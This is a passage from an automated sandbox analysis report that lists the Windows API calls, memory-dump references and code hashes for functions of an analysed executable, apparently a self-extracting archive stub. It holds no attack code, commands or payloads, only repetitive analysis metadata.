                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: c5b3cccdc6f1dd34187e9636e1a240fd4eed566f89d78be2dce3c72cad7b5c2a
                                                                      • Instruction ID: 35f0ea8a031e1798f8a3dbd73fdabdf1396b883d05c029b1f7fbfea680d84d0f
                                                                      • Opcode Fuzzy Hash: c5b3cccdc6f1dd34187e9636e1a240fd4eed566f89d78be2dce3c72cad7b5c2a
                                                                      • Instruction Fuzzy Hash: 38A001E62AD19ABC350A72516E0AC3B022DC8C5B61330A92FF916D9681A89818452872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 07851edfd0436b301858399ebc7e7125e28efba975eb71782318bb48af0cc176
                                                                      • Instruction ID: 35f0ea8a031e1798f8a3dbd73fdabdf1396b883d05c029b1f7fbfea680d84d0f
                                                                      • Opcode Fuzzy Hash: 07851edfd0436b301858399ebc7e7125e28efba975eb71782318bb48af0cc176
                                                                      • Instruction Fuzzy Hash: 38A001E62AD19ABC350A72516E0AC3B022DC8C5B61330A92FF916D9681A89818452872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 7f4e0981db4288e31933683e7e0f6917fcf7cdea5f21f689f47583ae4b1ebbb4
                                                                      • Instruction ID: 35f0ea8a031e1798f8a3dbd73fdabdf1396b883d05c029b1f7fbfea680d84d0f
                                                                      • Opcode Fuzzy Hash: 7f4e0981db4288e31933683e7e0f6917fcf7cdea5f21f689f47583ae4b1ebbb4
                                                                      • Instruction Fuzzy Hash: 38A001E62AD19ABC350A72516E0AC3B022DC8C5B61330A92FF916D9681A89818452872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 13a4d7ca669daa61846af09a906f9906ace2907959e6cadf86abbf5bbe936b9d
                                                                      • Instruction ID: 35f0ea8a031e1798f8a3dbd73fdabdf1396b883d05c029b1f7fbfea680d84d0f
                                                                      • Opcode Fuzzy Hash: 13a4d7ca669daa61846af09a906f9906ace2907959e6cadf86abbf5bbe936b9d
                                                                      • Instruction Fuzzy Hash: 38A001E62AD19ABC350A72516E0AC3B022DC8C5B61330A92FF916D9681A89818452872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 5ecf3a8769052a663ca12142bcd7217dceba3889c9c40170d4ec16222f4e120f
                                                                      • Instruction ID: 35f0ea8a031e1798f8a3dbd73fdabdf1396b883d05c029b1f7fbfea680d84d0f
                                                                      • Opcode Fuzzy Hash: 5ecf3a8769052a663ca12142bcd7217dceba3889c9c40170d4ec16222f4e120f
                                                                      • Instruction Fuzzy Hash: 38A001E62AD19ABC350A72516E0AC3B022DC8C5B61330A92FF916D9681A89818452872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 735fff4ac7bafb8758a93d037a7824a119979240d8b405a4ec3b9755f0092ac6
                                                                      • Instruction ID: f9383018707325c4f72a518b7ba98f0c51c7a218134d0af57aaf23f8c63e06af
                                                                      • Opcode Fuzzy Hash: 735fff4ac7bafb8758a93d037a7824a119979240d8b405a4ec3b9755f0092ac6
                                                                      • Instruction Fuzzy Hash: F1A011C22A8088BC300A32A02E0AC3B022CC8C0B22330A22FF802C82C0A8880A202830
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: de535502999bb9d14e30f5ae6c3c55e594acc16bcf2ea9d4dad6edf2f5b45e78
                                                                      • Instruction ID: b0692bb5ec7c7954e52bb69da37767a245bee451bb82f5aaab3230b9a603b4ab
                                                                      • Opcode Fuzzy Hash: de535502999bb9d14e30f5ae6c3c55e594acc16bcf2ea9d4dad6edf2f5b45e78
                                                                      • Instruction Fuzzy Hash: 55A012C115C045FC300631502E06C37012CC4C0B51330542FF402C82C0684808101430
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 69496487dcf5a70f3512d56684e9601d520e06ba811de080c00722b505b0f53d
                                                                      • Instruction ID: b0692bb5ec7c7954e52bb69da37767a245bee451bb82f5aaab3230b9a603b4ab
                                                                      • Opcode Fuzzy Hash: 69496487dcf5a70f3512d56684e9601d520e06ba811de080c00722b505b0f53d
                                                                      • Instruction Fuzzy Hash: 55A012C115C045FC300631502E06C37012CC4C0B51330542FF402C82C0684808101430
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetEndOfFile.KERNELBASE(?,007C903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 007C9F0C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File
                                                                      • String ID:
                                                                      • API String ID: 749574446-0
                                                                      • Opcode ID: 2730a0da8439b1793faa408d0d2ff79360b285bfbf0e385b2d688f2ea7e29bf5
                                                                      • Instruction ID: 977e08819abe5613b510e1a9ea9ea7a081db7a3333ca214811a02737133ee819
                                                                      • Opcode Fuzzy Hash: 2730a0da8439b1793faa408d0d2ff79360b285bfbf0e385b2d688f2ea7e29bf5
                                                                      • Instruction Fuzzy Hash: 24A0243004000D47CD401730CD0401C3711F7107C030041D55007CF071CF174407C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,007DAE72,C:\Users\user\Desktop,00000000,0080946A,00000006), ref: 007DAC08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory
                                                                      • String ID:
                                                                      • API String ID: 1611563598-0
                                                                      • Opcode ID: 38c4f33202d8c8af8bfe84152dea91ae8e4fa72c725550e82f8d7afa4e85784c
                                                                      • Instruction ID: 2b9a4d8e42b2d0d1bf00093752f00b5f964ffdd5b5c8ea0356a7ce9ae7e1b733
                                                                      • Opcode Fuzzy Hash: 38c4f33202d8c8af8bfe84152dea91ae8e4fa72c725550e82f8d7afa4e85784c
                                                                      • Instruction Fuzzy Hash: 9CA011302002008B82000B328F0AA0EBBAAAFA2B00F00C028A00080030CB38C820FA08
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 007DC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007DC2B1
                                                                      • EndDialog.USER32(?,00000006), ref: 007DC2C4
                                                                      • GetDlgItem.USER32(?,0000006C), ref: 007DC2E0
                                                                      • SetFocus.USER32(00000000), ref: 007DC2E7
                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 007DC321
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007DC358
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007DC36E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC38C
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC39C
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007DC3B8
                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007DC3D4
                                                                      • _swprintf.LIBCMT ref: 007DC404
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 007DC417
                                                                      • FindClose.KERNEL32(00000000), ref: 007DC41E
                                                                      • _swprintf.LIBCMT ref: 007DC477
                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 007DC48A
                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007DC4A7
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007DC4C7
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC4D7
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007DC4F1
                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007DC509
                                                                      • _swprintf.LIBCMT ref: 007DC535
                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 007DC548
                                                                      • _swprintf.LIBCMT ref: 007DC59C
                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 007DC5AF
                                                                        • Part of subcall function 007DAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007DAF35
                                                                        • Part of subcall function 007DAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,007FE72C,?,?), ref: 007DAF84
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                      • String ID: %s %s$%s %s %s$P}$REPLACEFILEDLG
                                                                      • API String ID: 797121971-4264152612
                                                                      • Opcode ID: b409fd35be3eb8239f6659e18e22c135989a7845c26bbd57ab57f9618a5b425e
                                                                      • Instruction ID: 330b02537092d9aa6ab95fb9cb80bf615a02e97ad5991aba5e374353a7b82185
                                                                      • Opcode Fuzzy Hash: b409fd35be3eb8239f6659e18e22c135989a7845c26bbd57ab57f9618a5b425e
                                                                      • Instruction Fuzzy Hash: B7917372148349BBD2329BA0DD49FFB77ACFB49700F04481AB749D6181D779AA05CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C6FAA
                                                                      • _wcslen.LIBCMT ref: 007C7013
                                                                      • _wcslen.LIBCMT ref: 007C7084
                                                                        • Part of subcall function 007C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007C7AAB
                                                                        • Part of subcall function 007C7A9C: GetLastError.KERNEL32 ref: 007C7AF1
                                                                        • Part of subcall function 007C7A9C: CloseHandle.KERNEL32(?), ref: 007C7B00
                                                                        • Part of subcall function 007CA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641,000000FF), ref: 007CA1F1
                                                                        • Part of subcall function 007CA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641), ref: 007CA21F
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 007C7139
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007C7155
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007C7298
                                                                        • Part of subcall function 007C9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007C73BC,?,?,?,00000000), ref: 007C9DBC
                                                                        • Part of subcall function 007C9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 007C9E70
                                                                        • Part of subcall function 007C9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007C95D6,?,?,?,?,?,007F2641,000000FF), ref: 007C963B
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA501
                                                                        • Part of subcall function 007CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA532
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                      • API String ID: 2821348736-3508440684
                                                                      • Opcode ID: c5b3538b563d5372591f34e31278ec4d6b2e90b80f08ac4707bb1e074e9b3376
                                                                      • Instruction ID: 15272b65eaaac6df883f03bb9208a5da7610dcddf7fde7eb75ff208c1123d059
                                                                      • Opcode Fuzzy Hash: c5b3538b563d5372591f34e31278ec4d6b2e90b80f08ac4707bb1e074e9b3376
                                                                      • Instruction Fuzzy Hash: FCC1B871904648EADB25DB74DC85FEEB7A8BF04300F04455EFA56E7282DB3CAA44CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007ED8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
